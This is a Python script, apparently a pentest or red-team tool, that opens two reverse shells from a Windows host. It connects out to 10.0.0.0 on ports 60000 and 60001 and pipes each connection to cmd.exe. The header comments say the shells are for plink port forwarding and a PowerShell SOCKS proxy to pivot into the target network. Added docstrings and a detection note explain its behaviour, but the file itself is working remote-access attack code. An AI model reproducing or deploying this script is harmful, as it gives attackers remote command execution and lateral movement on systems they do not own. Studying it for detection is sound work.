# Creates 2 shells on the target.
# One is used to set up a remote port forward using plink, which will kill that shell;
# the other can be used to set up a SOCKS proxy with PowerShell, to pivot into the target network.
import os,socket,subprocess,threading;
def ss2pp(ss, pp):
    """Relay bytes received on socket ``ss`` into the stdin pipe of process ``pp``.

    Runs until an exception escapes; there is no exit condition in the loop.
    Each iteration reads at most 1024 bytes from the socket, and an empty read
    is skipped rather than written.
    """
    while True:
        chunk = ss.recv(1024)
        if not chunk:
            # Nothing received on this pass; go straight back to recv().
            continue
        pp.stdin.write(chunk)
def pp2ss(ss, pp):
    """Relay the output pipe of process ``pp`` to socket ``ss`` one byte at a time.

    Runs until an exception escapes; there is no exit condition in the loop.
    """
    while True:
        # read(1) hands back a single byte per call, so each byte is sent on its own.
        one_byte = pp.stdout.read(1)
        ss.send(one_byte)
# First channel: an outbound TCP connection to 10.0.0.0:60000 wired to a cmd.exe child.
# Detection note: what this leaves observable on the host is a Python process that
# opens an outbound TCP connection and spawns cmd.exe with stdin, stdout and stderr
# all redirected to pipes.
ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ss.connect(("10.0.0.0", 60000))
pp = subprocess.Popen(
    ["\\windows\\system32\\cmd.exe"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,  # stderr is merged into the stdout pipe
)

# One relay thread per direction. Both are daemon threads, so they do not keep
# the interpreter alive once the main thread finishes.
ss2pp_thread = threading.Thread(target=ss2pp, args=(ss, pp))
ss2pp_thread.daemon = True
ss2pp_thread.start()

pp2ss_thread = threading.Thread(target=pp2ss, args=(ss, pp))
pp2ss_thread.daemon = True
pp2ss_thread.start()
def s2p(s, p):
    """Relay bytes received on socket ``s`` into the stdin pipe of process ``p``.

    Runs until an exception escapes; there is no exit condition in the loop.
    Each iteration reads at most 1024 bytes from the socket, and an empty read
    is skipped rather than written.
    """
    while True:
        chunk = s.recv(1024)
        if not chunk:
            # Nothing received on this pass; go straight back to recv().
            continue
        p.stdin.write(chunk)
def p2s(s, p):
    """Relay the output pipe of process ``p`` to socket ``s`` one byte at a time.

    Runs until an exception escapes; there is no exit condition in the loop.
    """
    while True:
        # read(1) hands back a single byte per call, so each byte is sent on its own.
        one_byte = p.stdout.read(1)
        s.send(one_byte)
# Second channel: same wiring as the first, on port 60001 of the same address,
# with its own cmd.exe child. From the host's point of view the process now holds
# two outbound TCP connections and two piped cmd.exe children.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.0", 60001))
p = subprocess.Popen(
    ["\\windows\\system32\\cmd.exe"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,  # stderr is merged into the stdout pipe
)

# One relay thread per direction. Both are daemon threads, so they do not keep
# the interpreter alive once the main thread finishes.
s2p_thread = threading.Thread(target=s2p, args=(s, p))
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=(s, p))
p2s_thread.daemon = True
p2s_thread.start()
# The main thread blocks on the two child processes, first p and then pp.
# Only a KeyboardInterrupt during the wait closes the sockets.
# NOTE(review): the page lost its indentation; both close() calls are read here
# as belonging to the except branch. Confirm against the original file.
try:
    for child in (p, pp):
        child.wait()
except KeyboardInterrupt:
    for conn in (s, ss):
        conn.close()